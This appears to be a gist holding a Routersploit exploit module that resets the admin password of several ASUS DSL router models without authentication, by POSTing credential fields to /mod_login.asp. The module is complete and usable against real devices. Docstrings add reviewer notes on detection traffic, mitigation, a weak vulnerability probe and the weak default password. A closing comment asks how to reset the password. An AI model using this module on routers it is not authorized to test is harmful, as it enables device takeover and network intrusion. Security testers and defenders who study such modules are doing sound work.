Created
August 14, 2018 18:22
ASUS Router Password Reset - Routersploit module
import random | |
import string | |
from routersploit.core.exploit import * | |
from routersploit.core.http.http_client import HTTPClient | |
class Exploit(HTTPClient):
    """Routersploit module that submits an admin-credential change to an ASUS DSL router.

    ``run`` calls ``check`` and, when that passes, POSTs a password-change
    form to ``/mod_login.asp`` with the ``username`` and ``password`` options
    as the new credentials. The headers and form fields assembled here carry
    no existing credentials or session token; whether
    ``HTTPClient.http_request`` adds anything is not visible in this file.

    Notes for reviewers and defenders:

    * ``check`` only tests that ``GET /mod_login.asp`` answers HTTP 200. It
      does not inspect the body, so any device or web server that serves that
      path is reported as "appears to be vulnerable".
    * ``run`` is state-changing: on an affected device it replaces the admin
      credentials. Nothing here verifies afterwards that the change took
      effect, and a 200 response body is returned as-is.
    * The default new password is the literal ``"password"``. A device left
      with that value after an authorized test is trivially guessable, so the
      option should be set explicitly and the credential rotated afterwards.
    * Detection: the traffic is a GET followed by a POST to
      ``/mod_login.asp`` whose form body contains ``action_mode=apply``,
      ``usernamepasswdFlag=1``, ``http_username`` and ``http_passwd``. The
      Referer is the bare target value plus ``/Main_Password.asp`` with no
      URL scheme.
    * Mitigation: the models in ``__info__["devices"]`` are the ones this
      module claims. Consult the write-up under ``references`` for the vendor
      fix, and keep the router's web administration interface reachable only
      from trusted networks.
    """

    # Module metadata consumed by the Routersploit framework.
    __info__ = {
        "name": "ASUS Router Password Reset",
        "description": (
            "Module exploits remote flaw in ASUS devices to reset the "
            "admin password. If the target is vulnerable, it will be "
            "set to the attacker's chosing."
        ),
        "authors": (
            "@jnazario",  # routersploit module
        ),
        "references": (
            "https://www.securityartwork.es/2018/01/25/some-vulnerability-in-asus-routers/",
        ),
        "devices": (
            "DSL-AC51",
            "DSL-AC52U",
            "DSL-AC55U",
            "DSL-N55U C1",
            "DSL-N55U D1",
            "DSL-AC56U",
            "DSL-N10_C1",
            "DSL-N12U C1",
            "DSL-N12E C1",
            "DSL-N14U",
            "DSL-N14U-B1",
            "DSL-N16",
            "DSL-N16U",
            "DSL-N17U",
            "DSL-N66U",
            "DSL-AC750",
        ),
    }

    # Operator-settable options (descriptors from routersploit.core.exploit).
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")
    # Account name written into the ``http_username`` form field.
    username = OptString("admin", "Account to change")
    # Value written into ``http_passwd``; the default is a weak literal.
    password = OptString("password", "New password password")

    def run(self):
        """Probe the target and, if the probe passes, submit the credential change.

        Returns:
            ``''`` when the POST yields no response, the response body text
            when the POST returns HTTP 200, and ``None`` otherwise (the probe
            failed, or the POST returned a non-200 status, in which case
            nothing is printed).
        """
        # NOTE(review): indentation was lost in the published copy. This
        # branch is read as the ``else`` of the check() test, the usual
        # Routersploit layout. Confirm against the original file.
        if not self.check():
            print_error("Target is not vulnerable")
            return None

        # Reached on nothing more than a 200 from GET /mod_login.asp.
        print_success("Target appears to be vulnerable")

        request_headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer": self.target + "/Main_Password.asp",
        }
        # Form fields of the password page; only the username and password
        # entries come from module options, the rest are fixed literals.
        form_fields = {
            "group_id": "",
            "action_mode": "apply",
            "current_page": "Main_Password.asp",
            "next_page": "/index.asp",
            "flag": "",
            "usernamepasswdFlag": "1",
            "http_username": self.username,
            "http_passwd": self.password,
            "foilautofill": "",
        }

        reply = self.http_request(
            method="POST",
            path="/mod_login.asp",
            headers=request_headers,
            data=form_fields,
        )

        if reply is None:
            print_error("Exploit failed")
            return ''

        # NOTE(review): a 200 is treated as the end state. The code does not
        # confirm that the credentials were actually changed.
        if reply.status_code == 200:
            return reply.text
        return None

    @mute
    def check(self):
        """Return True when ``GET /mod_login.asp`` answers with HTTP 200.

        This is a reachability test for the page, not proof of the flaw: the
        body is never inspected. ``@mute`` comes from
        ``routersploit.core.exploit`` (presumably it silences output during
        the probe; confirm against the framework).
        """
        probe = self.http_request(method="GET", path="/mod_login.asp")
        return probe is not None and probe.status_code == 200
how to reset password?